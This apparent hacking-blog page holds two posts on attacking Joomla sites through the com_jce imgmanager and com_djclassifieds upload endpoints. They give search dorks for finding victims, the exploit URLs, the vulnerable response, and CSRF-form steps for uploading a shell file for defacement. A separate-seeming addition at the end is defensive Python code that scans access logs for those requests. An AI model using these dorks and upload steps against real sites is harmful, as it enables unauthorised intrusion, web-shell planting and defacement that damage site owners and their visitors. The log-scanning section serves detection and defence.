Posts

Showing posts from May, 2019

Joomla BT Websites vulnerability com_jce with csrf

Dork: intext:"Built By BT Websites"
Exploit: index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
CSRF: pastebin

Dork first; let's assume you've already got a target. If you don't want the hassle, just use a bot.

Append the exploit. Example:
site.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20

Vulnerable? {"result":null,"error":"No function call specified!"}

Enter the target into the CSRF form. Upload a gif/jpg/png file, then check the file at site.com/shell.gif

OK, that's all there is to it.

Deface method: Joomla com_djclassifieds File Upload Vulnerability

Hey guys, this time I'm going to share the com_djclassifieds deface method. OK, let's get straight to it.

What you need:
- Phone / PC
- Internet (well, obviously)
- Offline CSRF / online CSRF
  Oh, and with the offline CSRF the filetype can be changed, for example: shell.php. Save the offline CSRF with an html/htm extension.
- Exploit: index.php?option=com_djclassifieds&task=upload&tmpl=component
- Dork:
  inurl:/com_djclassifieds
  inurl:/components/com_djclassifieds/
  Develop these further to find vulnerable sites. Oh, and the dork can also be searched in image search.

For example, like this: enter the exploit
index.php?option=com_djclassifieds&task=upload&tmpl=component

Example:
site.com/components/com_djclassifieds
site.com/index.php?option=com_djclassifieds&task=upload&tmpl=component
or
site.com/[path]/components/com_djclassifieds
site.com/[path]/index.php?option=com_djclassifieds&task=upload&tmpl=component

Signs that it is vulnerable

Copy the link and paste it into the CSRF form from before
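For site owners, requests to the two endpoints quoted in the posts above can be found in web server access logs. The following is an added example, not part of the original posts; it assumes the common/combined log format, and the rule names, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Rule name -> query parameters that must all be present (values taken from the URLs above).
RULES = {
    "com_jce imgmanager form": {"option": "com_jce", "task": "plugin",
                                "plugin": "imgmanager", "method": "form"},
    "com_djclassifieds upload": {"option": "com_djclassifieds", "task": "upload"},
}

# Common/combined access log format: client, timestamp, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def match_rule(target):
    """Return the name of the rule a request target matches, or None."""
    # parse_qs percent-decodes, so encoded or reordered parameters still match.
    # The path is ignored so that /[path]/index.php and bare / are both covered.
    params = parse_qs(urlsplit(target).query)
    # Last value wins for a repeated key; lower-cased to keep matching tolerant.
    query = {k.lower(): v[-1].lower() for k, v in params.items()}
    for name, required in RULES.items():
        if all(query.get(k) == v for k, v in required.items()):
            return name
    return None

def scan(lines):
    """Return (client, method, status, rule) for every matching log line."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, method, target, status = m.groups()
        rule = match_rule(target)
        if rule:
            hits.append((client, method, int(status), rule))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2019:10:01:02 +0000] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 58 "-" "-"',
    '203.0.113.7 - - [12/May/2019:10:01:09 +0000] "POST /shop/index.php?tmpl=component&task=upload&option=com%5Fdjclassifieds HTTP/1.1" 200 120 "-" "-"',
    '198.51.100.4 - - [12/May/2019:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9120 "-" "-"',
    '198.51.100.4 - - [12/May/2019:10:02:05 +0000] "GET /index.php?option=com_jce&task=plugin&plugin=link HTTP/1.1" 403 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status on a site that does not use these components' front-end upload forms is worth following up by reviewing recently created image or script files under the web root.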